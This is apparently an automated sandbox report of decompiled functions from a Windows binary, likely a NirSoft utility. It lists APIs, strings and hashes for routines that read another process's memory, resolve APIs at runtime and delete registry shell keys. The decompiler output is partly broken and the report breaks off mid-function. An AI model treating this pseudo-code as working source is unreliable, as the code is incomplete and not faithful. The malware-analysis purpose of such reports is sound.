Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}

0x00406216
0x0040621b
0x00406222
0x0040625f
0x00406263
0x00406269
0x00406271
0x00406273
0x00406289
0x00406289
0x0040628e
0x0040628f
0x004062a9
0x004062ab
0x004062ad
0x004062b0
0x004062c3
0x004062c3
0x004062d3
0x004062da
0x004062f1
0x004062f7
0x004062fe
0x0040630d
0x00406312
0x0040631e
0x00406327
0x00406275
0x00406283
0x00406283
0x00406285
0x00406287
0x00000000
0x00000000
0x00406277
0x0040627a
0x00406280
0x00406280
0x00000000
0x00406280
0x00000000
0x0040627a
0x00000000
0x00406283
0x00406273
0x00406224
0x00406224
0x00406229
0x0040622a
0x0040622f
0x00406236
0x0040623c
0x00406243
0x00406245
0x00406247
0x00406248
0x0040624b
0x00406254
0x00406254
0x0040632d
0x00406334

APIs

LoadMenuW.USER32 ref: 00406236

Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7

DestroyMenu.USER32(00000000), ref: 00406254
CreateDialogParamW.USER32 ref: 004062A9
GetDesktopWindow.USER32 ref: 004062B4
CreateDialogParamW.USER32 ref: 004062C1
memset.MSVCRT ref: 004062DA
GetWindowTextW.USER32 ref: 004062F1
EnumChildWindows.USER32 ref: 0040631E
DestroyWindow.USER32(00000005), ref: 00406327

Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2

Strings

caption, xrefs: 00406308

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

0x004081e4
0x004081ec
0x004081fc
0x00408200
0x00408215
0x0040821c
0x0040822a
0x00408231
0x0040823f
0x00408246
0x0040824b
0x0040824e
0x0040825a
0x0040825c
0x00408261
0x0040826c
0x0040826d
0x0040826e
0x00408273
0x00408273
0x00408276
0x0040827c
0x0040828a
0x00408290
0x004082ab
0x004082c5
0x004082c6
0x004082d1
0x004082d2
0x004082d3
0x004082e7
0x004082ec
0x004082f0
0x00000000
0x004082f5
0x004082fe

APIs

memset.MSVCRT ref: 0040821C
memset.MSVCRT ref: 00408231
memset.MSVCRT ref: 00408246
_snwprintf.MSVCRT ref: 0040826E
wcscpy.MSVCRT ref: 0040828A
_snwprintf.MSVCRT ref: 004082D3

Strings

<table dir="rtl"><tr><td>, xrefs: 00408284
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

0x0040920a
0x00409218
0x00409223
0x0040922c
0x0040924b
0x00409253
0x0040929b
0x004092e4
0x0040929d
0x004092a3
0x004092b1
0x004092bd
0x004092cc
0x004092d1
0x004092d8
0x004092dd
0x00409255
0x0040925b
0x00409269
0x00409275
0x00409282
0x0040928d
0x00409292
0x004092ec
0x004092ef
0x004092ef
0x00409231
0x00409232
0x00409233
0x00000000
0x00409239
0x0040921a
0x00000000

APIs

wcschr.MSVCRT ref: 00409223
wcscpy.MSVCRT ref: 00409233

Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1

wcscpy.MSVCRT ref: 00409282
wcscat.MSVCRT ref: 0040928D
memset.MSVCRT ref: 00409269

Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E

memset.MSVCRT ref: 004092B1
memcpy.MSVCRT ref: 004092CC
wcscat.MSVCRT ref: 004092D8

Strings

\systemroot, xrefs: 00409240

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE

Uniqueness

Uniqueness Score: -1.00%

Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}

0x00409c73
0x00409c7c
0x00409c90
0x00409c9f
0x00409ca2
0x00409ca7
0x00409ca9
0x00409cb1
0x00409cc0
0x00409cc2
0x00409cc7
0x00409ccf
0x00409cd0
0x00409cd7
0x00409cd8
0x00409cd9
0x00409cda
0x00409cdc
0x00409ce0
0x00409ce1
0x00409ce9
0x00409cf1
0x00409cfb
0x00409d08
0x00409d08
0x00000000
0x00409d0d
0x00409d0f

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
strlen.MSVCRT ref: 00409CE4
strlen.MSVCRT ref: 00409CF1

Strings

kernel32.dll, xrefs: 00409C8B
ntdll.dll, xrefs: 00409CB3
LdrGetProcedureAddress, xrefs: 00409CBA
GetProcAddress, xrefs: 00409C98, 00409C9D

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcstrlen
String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
API String ID: 1027343248-2054640941
Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}

0x00401ac9
0x00401ad1
0x00401ae1
0x00401ae7
0x00401ae9
0x00401aec
0x00401c1b
0x00401af2
0x00401af2
0x00401af8
0x00401b0c
0x00401b1a
0x00401bfd
0x00401b20
0x00401b26
0x00401b2b
0x00401b36
0x00401b40
0x00401b43
0x00401b4a
0x00401b54
0x00401b55
0x00401b56
0x00401b57
0x00401b58
0x00401b63
0x00401b68
0x00401b69
0x00401b77
0x00401b7d
0x00401b82
0x00401b82
0x00401b88
0x00401b8b
0x00401b8e
0x00401b91
0x00401b98
0x00401b9b
0x00401ba0
0x00401ba5
0x00401baa
0x00401bac
0x00401bac
0x00401bb2
0x00401bb2
0x00401bbe
0x00401bc4
0x00401bc6
0x00401bc8
0x00401bc8
0x00401bd7
0x00401bee
0x00401bf0
0x00401bf0
0x00401c0e
0x00401c0e
0x00401c23

APIs

OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
memset.MSVCRT ref: 00401B4A
ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
_snwprintf.MSVCRT ref: 00401B69

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA

GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15

Strings

%d %I64x, xrefs: 00401B58

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
String ID: %d %I64x
API String ID: 2567117392-2565891505
Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}

0x004045c2
0x004045d1
0x004045da
0x004045ef
0x004045f6
0x00404604
0x0040460b
0x00404610
0x00404616
0x00404617
0x00404618
0x00404628
0x00404629
0x0040462a
0x0040462f
0x00404630
0x00404631
0x0040463c
0x0040463d
0x0040463e
0x00404656
0x00404662
0x0040466b
0x0040466d
0x0040466e
0x00404674
0x00404679

APIs

memset.MSVCRT ref: 004045F6
memset.MSVCRT ref: 0040460B
_snwprintf.MSVCRT ref: 0040462A
_snwprintf.MSVCRT ref: 0040463E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404656
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404662
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?,?,00403904), ref: 0040466E

Strings

%s\shell\%s\command, xrefs: 00404618
%s\shell\%s, xrefs: 00404631

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete_snwprintfmemset$Close
String ID: %s\shell\%s$%s\shell\%s\command
API String ID: 1018939227-3575174989
Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED

Uniqueness

Uniqueness Score: -1.00%

Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

0x0040314a
0x00403151
0x00403158
0x0040315a
0x00403162
0x00403166
0x00403190
0x00403190
0x00403198
0x00403199
0x0040319e
0x004031bb
0x004031a0
0x004031ad
0x004031b6
0x004031b6
0x0040319e
0x0040316e
0x00403176
0x0040317c
0x0040317f
0x0040317f
0x00403182
0x0040318a
0x00000000
0x0040318c
0x0040318c
0x00000000
0x0040318c

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
#17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

Strings

InitCommonControlsEx, xrefs: 00403168
Error, xrefs: 004031A2
comctl32.dll, xrefs: 00403145
Error: Cannot load the common control classes., xrefs: 004031A7

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C

Uniqueness

Uniqueness Score: -1.00%

Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}

0x00404da9
0x00404dbc
